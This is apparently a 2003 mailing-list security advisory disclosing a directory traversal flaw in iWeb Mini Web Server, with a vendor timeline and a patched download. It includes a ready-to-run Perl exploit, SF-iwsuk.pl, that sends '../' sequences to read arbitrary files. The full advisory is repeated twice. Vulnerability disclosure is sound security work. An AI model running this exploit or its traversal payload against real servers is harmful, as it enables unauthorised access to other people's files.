subversive
16/04/03, 15:20
[================================================== ===============]
[...............:[ S e c u r i t y F r e a k s ]:...............]
[.................:[ www.securityfreaks.com ]:..................]
[================================================== ===============]
Title : iWeb Mini Web Server Remote Directory Traversal
Risk : Moderate - Low
Software : iWeb Mini Web Server
Platforms : Windows NT/XP/9x
Vendor URL : http://www.ashleybrown.co.uk/iweb/
Discovered by : subversive <subversive@linuxmail.org>
Advisory ID : SFAD03-001
......:[ Overview :
The iWeb Mini Web Server is a mini web server designed for use on
Intranets and for testing websites in a realistic environment.
......:[ Details :
iWeb does not correctly filter GET requests for ../ characters
thereby allowing us to escape the webroot and remotely traverse
the directory structure of the remote host.
......:[ Vendor Status :
14/04/03 Initial Contact Made
15/04/03 Vendor Responded
15/04/03 Vendor Released Updated Version
......:[ Solution :
Remove old iWeb application and download and install the updated
version which can be found at:
http://ashleybrown.co.uk/downloads/iws2.exe
......:[ Exploit - SF-iwsuk.pl :
#!/usr/bin/perl -w
#
# S e c u r i t y F r e a k s
# www.securityfreaks.com
#
# iWeb Mini Web Server Remote Directory Traversal
#
# subversive[at]linuxmail.org - *15/04/2003*
use IO::Socket;
if(!$ARGV[0]) {
print <<"IWEBSUK";
S e c u r i t y F r e a k s
www.securityfreaks.com
-------------------------------------------------------------
SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal
-------------------------------------------------------------
Usage: $0 <host> <file> <port>
IWEBSUK
exit;
}
else{
$host = $ARGV[0];
}
if(!$ARGV[2]) {
$port = "80";
}
else {
$port = $ARGV[2];
}
my $sock = new IO::Socket::INET ( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
);
die "\nConnection to $host:$port failed\n" unless $sock;
print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n";
while(<$sock>) { print }
close($sock);
print("\n\n");
exit;
--
______________________________________________
http://www.linuxmail.org/
Now with e-mail forwarding for only US$5.95/yr
Powered by Outblaze
[...............:[ S e c u r i t y F r e a k s ]:...............]
[.................:[ www.securityfreaks.com ]:..................]
[================================================== ===============]
Title : iWeb Mini Web Server Remote Directory Traversal
Risk : Moderate - Low
Software : iWeb Mini Web Server
Platforms : Windows NT/XP/9x
Vendor URL : http://www.ashleybrown.co.uk/iweb/
Discovered by : subversive <subversive@linuxmail.org>
Advisory ID : SFAD03-001
......:[ Overview :
The iWeb Mini Web Server is a mini web server designed for use on
Intranets and for testing websites in a realistic environment.
......:[ Details :
iWeb does not correctly filter GET requests for ../ characters
thereby allowing us to escape the webroot and remotely traverse
the directory structure of the remote host.
......:[ Vendor Status :
14/04/03 Initial Contact Made
15/04/03 Vendor Responded
15/04/03 Vendor Released Updated Version
......:[ Solution :
Remove old iWeb application and download and install the updated
version which can be found at:
http://ashleybrown.co.uk/downloads/iws2.exe
......:[ Exploit - SF-iwsuk.pl :
#!/usr/bin/perl -w
#
# S e c u r i t y F r e a k s
# www.securityfreaks.com
#
# iWeb Mini Web Server Remote Directory Traversal
#
# subversive[at]linuxmail.org - *15/04/2003*
use IO::Socket;
if(!$ARGV[0]) {
print <<"IWEBSUK";
S e c u r i t y F r e a k s
www.securityfreaks.com
-------------------------------------------------------------
SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal
-------------------------------------------------------------
Usage: $0 <host> <file> <port>
IWEBSUK
exit;
}
else{
$host = $ARGV[0];
}
if(!$ARGV[2]) {
$port = "80";
}
else {
$port = $ARGV[2];
}
my $sock = new IO::Socket::INET ( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
);
die "\nConnection to $host:$port failed\n" unless $sock;
print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n";
while(<$sock>) { print }
close($sock);
print("\n\n");
exit;
--
______________________________________________
http://www.linuxmail.org/
Now with e-mail forwarding for only US$5.95/yr
Powered by Outblaze